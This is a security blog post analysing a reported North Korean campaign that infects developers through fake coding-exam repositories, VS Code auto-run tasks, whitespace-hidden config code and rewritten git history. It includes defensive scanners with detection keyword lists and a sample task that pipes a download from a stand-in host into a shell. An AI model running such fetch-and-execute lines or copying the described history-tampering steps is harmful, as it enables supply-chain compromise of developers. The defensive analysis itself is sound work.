TempMail Ninja

Void Dokkaebi campaign: North Korea Targets Developers on GitHub


The global developer community is currently facing one of the most insidious cyber-threats in recent history. On April 28, 2026, cybersecurity researchers released comprehensive details on the Void Dokkaebi campaign, a sophisticated operation orchestrated by the North Korean state-sponsored group known as Famous Chollima. This campaign has effectively weaponized the very culture of open-source collaboration and the recruitment rituals of the tech industry. By blending psychological manipulation with technical ingenuity, Void Dokkaebi has moved beyond traditional spear-phishing into a new era of self-spreading supply-chain attacks that turn victims into unwitting distributors of malware.

The Anatomy of the Void Dokkaebi Campaign: A Cultural Exploit

The Void Dokkaebi campaign represents a masterclass in social engineering, specifically targeting the “geekiest” and most ambitious sectors of digital culture: AI and cryptocurrency development. The attack begins not with a malicious link in a cold email, but with a highly personalized recruitment pitch. Threat actors create synthetic identities—often utilizing AI-generated avatars and deepfake professional histories—to pose as recruiters from prestigious firms.

The hook is a “technical assessment” or “coding exam.” Developers, eager to prove their skills for a high-paying role in a burgeoning field, are invited to clone a repository from popular platforms like GitHub, GitLab, or Bitbucket. These repositories are not merely hosting malware; they are the starting point of a “Contagious Interview” pattern. Unlike previous iterations of this tactic, which relied on the victim manually running a compromised executable, the Void Dokkaebi campaign leverages the trust developers place in their integrated development environments (IDEs).

Technical Breakdown: The Visual Studio Code Trap

At the heart of this campaign lies a clever exploitation of Visual Studio Code (VS Code) configurations. When a developer clones the “technical exam” repository and opens it in VS Code, they are typically met with a standard prompt asking if they “Trust the authors of the files in this folder.” Because the request comes in the context of a job interview and a legitimate-looking codebase, most developers click “Yes” without a second thought. This single click triggers a chain of events that bypasses traditional security layers.

Automated Execution via tasks.json

The repositories contain a hidden .vscode/tasks.json file. This file is a legitimate VS Code feature designed to automate repetitive tasks like building or testing code. However, Void Dokkaebi has weaponized it by configuring tasks to run automatically upon the folder being opened. Researchers have identified several variants of these malicious configurations:

  • The Downloader Variant: These tasks use PowerShell or curl to fetch a primary payload—often the DEV#POPPER Remote Access Trojan (RAT)—from a remote server or a blockchain transaction.
  • The Disguised Asset Variant: In some cases, the payload is hidden within the repository itself as a fake image or font file. The tasks.json configuration executes a script that extracts and runs the malware from these binary blobs.

By March 2026, security analysts had identified over 500 unique malicious VS Code task configurations in the wild. The ingenuity of this method is that the malware never touches the developer’s email; it enters the system through a trusted git-clone command and executes through a trusted IDE.
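A defender-side check for the tasks.json trick described above, added here as an example (not code from the original post or from the researchers it cites): it parses every .vscode/tasks.json in a checkout, reports tasks configured with runOptions.runOn set to "folderOpen", and flags those whose command line contains download-or-execute keywords. The keyword list is illustrative and the sample tasks.json is constructed.

```python
"""Find VS Code tasks that auto-run on folder open in a cloned repository."""
import json
import re
from pathlib import Path

# Illustrative keywords worth a second look in an auto-run task (assumption, not complete).
SUSPICIOUS = re.compile(
    r"\b(curl|wget|powershell|pwsh|iex|Invoke-Expression|Invoke-WebRequest|certutil|base64)\b",
    re.IGNORECASE,
)


def _strip_line_comments(text: str) -> str:
    """VS Code accepts // comments in tasks.json; drop them before json.loads."""
    return "\n".join(re.sub(r"^\s*//.*$", "", line) for line in text.splitlines())


def find_auto_tasks(tasks_json_text: str) -> list:
    """Return every task whose runOptions.runOn is "folderOpen", with a suspicion flag."""
    data = json.loads(_strip_line_comments(tasks_json_text))
    findings = []
    for task in data.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
        findings.append({"label": task.get("label", "<unnamed>"),
                         "command": cmd.strip(),
                         "suspicious": bool(SUSPICIOUS.search(cmd))})
    return findings


def scan_repo(root: str) -> list:
    """Walk a checkout and scan each .vscode/tasks.json found under it."""
    hits = []
    for path in Path(root).rglob("tasks.json"):
        if path.parent.name == ".vscode" and path.is_file():
            text = path.read_text(encoding="utf-8", errors="replace")
            hits.extend({"file": str(path), **f} for f in find_auto_tasks(text))
    return hits


# Constructed sample: a plausible "coding exam" tasks.json with one hidden auto-run task.
SAMPLE_TASKS_JSON = """{
  // ordinary-looking build configuration
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "prepare", "type": "shell",
     "command": "curl -s https://example.invalid/setup.sh | sh",
     "runOptions": {"runOn": "folderOpen"}}
  ]
}"""

if __name__ == "__main__":
    for hit in find_auto_tasks(SAMPLE_TASKS_JSON):
        print(hit)
```

Run scan_repo on a freshly cloned assessment repository before opening it in the IDE; any non-empty result is reason to open the folder in restricted mode or not at all.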

The “Self-Spreading” Mechanism: Weaponizing Git History

The most alarming feature of the Void Dokkaebi campaign is its ability to “self-spread.” Once a developer’s machine is compromised, the attackers do not stop at stealing credentials or cryptocurrency keys. They deploy a specialized tool, often identified in repositories as temp_auto_push.bat, which targets the developer’s own professional repositories.

Git History Rewriting and Stealth Injection

The threat actors utilize a “commit tampering” tool that performs a surgical strike on the victim’s existing codebases. The process is as follows:

  1. Malicious Code Injection: The tool injects heavily obfuscated JavaScript into configuration files such as tailwind.config.js, next.config.mjs, or postcss.config.mjs. To avoid detection during casual code reviews, the malicious code is often pushed to the far right edge of the editor using thousands of characters of whitespace.
  2. Clock Restoration and Amendment: To maintain the illusion of legitimacy, the tool temporarily resets the system clock to match the timestamp of the developer’s previous legitimate commit. It then uses git commit --amend to fold the malicious injection into a historical commit.
  3. Bypassing Security Hooks: The tool executes the commit using the --no-verify flag. This bypasses any pre-commit hooks or local linting tools that might otherwise flag the suspicious code.
  4. Force-Pushing the Infection: Finally, the rewritten history is force-pushed to the remote repository. Because the history has been “cleaned,” other contributors to the project may not even see a new commit notification, yet they will receive the infected code the next time they pull from the branch.

This turns every compromised developer into a “Typhoid Mary” of the open-source world. As of today, researchers have identified over 750 repositories—including those belonging to major organizations like DataStax and Neutralinojs—that have carried these infection markers.
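The whitespace-padding trick from step 1 above has a simple signature: a line in a config file where a run of hundreds of spaces is followed by more code. The scanner below is an added example (not the campaign tooling and not code from the original post); the 200-column threshold, the watched file names and the sample tailwind.config.js are my own choices, constructed for illustration.

```python
"""Flag config-file lines that hide code behind a long run of whitespace."""
import re
from pathlib import Path

# Config files named in the Void Dokkaebi reporting, plus their .js variants (assumption).
WATCHED = {"tailwind.config.js", "next.config.mjs", "next.config.js",
           "postcss.config.mjs", "postcss.config.js"}


def find_hidden_code(text: str, min_gap: int = 200) -> list:
    """Return one finding per line where >= min_gap spaces/tabs precede further content."""
    gap = re.compile(r"[ \t]{%d,}(?=\S)" % min_gap)   # greedy: reports the whole run
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        m = gap.search(line)
        if m:
            findings.append({"line": no,
                             "gap": m.end() - m.start(),
                             "tail": line[m.end():][:60]})   # preview of what was hidden
    return findings


def scan_repo(root: str, names=WATCHED, min_gap: int = 200) -> list:
    """Scan every watched config file under a checkout."""
    hits = []
    for path in Path(root).rglob("*"):
        if path.name in names and path.is_file():
            text = path.read_text(encoding="utf-8", errors="replace")
            hits.extend({"file": str(path), **f} for f in find_hidden_code(text, min_gap))
    return hits


# Constructed sample: a normal-looking tailwind.config.js whose third line carries
# a placeholder for obfuscated code pushed 3000 columns to the right.
SAMPLE_TAILWIND_CONFIG = (
    "module.exports = {\n"
    "  content: ['./src/**/*.{js,jsx}'],\n"
    "  theme: { extend: {} }," + " " * 3000 + "var _0x = [];  /* placeholder */\n"
    "}\n"
)

if __name__ == "__main__":
    for hit in find_hidden_code(SAMPLE_TAILWIND_CONFIG):
        print(hit)
```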

Payloads and Command-and-Control: The Blockchain Connection

The Void Dokkaebi campaign primarily delivers the DEV#POPPER RAT, a cross-platform tool written in Node.js. This malware is designed specifically for developer workstations, featuring capabilities to exfiltrate browser data, grab cryptocurrency wallet files, and establish persistent reverse shells. What makes the C2 (Command and Control) infrastructure unique is its resilience against traditional takedowns.

Blockchain as a Dead Drop Resolver

Void Dokkaebi utilizes public blockchain networks—including Tron, Aptos, and the Binance Smart Chain—as a “dead drop” for their C2 instructions and secondary payloads. By embedding encrypted data within legitimate blockchain transactions, the threat actors ensure that even if their primary domains are seized, the malware can still “phone home” to retrieve new instructions. This decentralized approach makes the infrastructure nearly impossible for standard ISPs or security vendors to dismantle entirely.

Evasion of CI/CD and Sandboxes

The malware is surprisingly “aware” of its environment. It includes logic to detect if it is running in a Continuous Integration/Continuous Delivery (CI/CD) pipeline or a cloud-based sandbox. If such an environment is detected, the malware remains dormant. It specifically hunts for “real” developer workstations—machines with active user input, specific hardware signatures, and established development environments. This selectivity ensures that automated repository scanners frequently miss the malicious code, allowing it to persist in the supply chain for extended periods.

The Global Impact on Open-Source Trust

The scale of the Void Dokkaebi campaign has sent shockwaves through the tech industry. In late March and April 2026, the discovery of infected commits in popular libraries like Neutralinojs (which has over 8,000 GitHub stars) highlighted the extreme risk. In the case of Neutralinojs, the attackers force-pushed malicious commits across four repositories in a single automated burst, which went undetected for several days.

The campaign exploits the “trust-by-default” nature of the developer ecosystem. Developers frequently fork, clone, and contribute to hundreds of projects, often assuming that the reputation of the repository or the contributor provides a layer of safety. Void Dokkaebi proves that once a single developer is compromised through a fake job interview, that trust becomes a liability. The “worm-like” nature of the propagation means that a single successful social engineering attempt can potentially reach thousands of downstream users.

Defense and Mitigation: Securing the Development Workflow

Protecting against the Void Dokkaebi campaign requires a fundamental shift in how developers and organizations approach their local environments and recruitment processes. Security professionals are recommending the following high-priority defenses:

  • Isolated Interview Environments: Developers should never clone or run code for a technical assessment on their primary workstation. Use disposable Virtual Machines (VMs), containers (like Docker), or cloud-based IDEs (like GitHub Codespaces) that are isolated from the local network and personal credentials.
  • Audit VS Code Trust: Be extremely cautious when a new repository asks for “Workspace Trust.” Organizations should consider enforcing policies that disable automatic task execution (task.allowAutomaticTasks: false) in VS Code.
  • Enforce Signed Commits: To prevent the “Git history-rewriting” tactic from going unnoticed, organizations should mandate GPG-signed commits. If an attacker attempts to amend a commit or rewrite history, the signature will be broken, providing an immediate red flag.
  • Block Force Pushes: Repository administrators should enable branch protection rules that strictly forbid git push --force on main and development branches. This prevents the “silent” overwriting of history that Void Dokkaebi relies on for its stealthy propagation.
  • Ignore .vscode Folders: Consider adding .vscode/ to the global .gitignore file to prevent accidental (or malicious) configuration files from being committed to the codebase.

Conclusion: The Future of Developer-Targeted Threats

The Void Dokkaebi campaign is a stark reminder that as security software becomes better at catching traditional malware, threat actors will move “up-stack” to target the humans who write the software. By weaponizing the tools and professional aspirations of the developer community, Famous Chollima has created a threat that is as much a psychological challenge as it is a technical one. In an era where “code is law,” the guardians of that code—the developers—are now the primary targets. Vigilance, isolation of environments, and a healthy skepticism of “dream job” recruiters are no longer optional; they are essential for the survival of the open-source ecosystem.

Written by

TempMail Ninja

Digital privacy and online security expert. Passionate about creating tools that protect users' identity on the internet.